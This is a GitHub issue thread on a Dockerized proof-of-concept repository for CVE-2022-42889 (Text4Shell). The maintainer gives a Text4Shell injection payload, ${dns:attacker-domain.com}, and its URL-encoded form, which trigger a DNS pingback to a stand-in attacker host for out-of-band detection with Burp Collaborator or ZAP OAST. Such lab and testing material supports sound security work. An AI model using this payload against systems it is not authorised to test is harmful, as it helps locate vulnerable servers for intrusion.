karthikuj / cve-2022-42889-text4shell-docker

Dockerized POC for CVE-2022-42889 Text4Shell
75 stars 32 forks source link

what about using dns? #1

Open marcelo321 opened 1 year ago

marcelo321 commented 1 year ago

How do you use it with script:dns?

karthikuj commented 1 year ago

For getting a DNS pingback you can use a payload like this: ${dns:attacker-domain.com}

You might have to url encode the payload, so the final payload will be like: %24%7Bdns%3Aattacker-domain.com%7D

You can try this using Burp collaborator or ZAP OAST. Does this answer your question?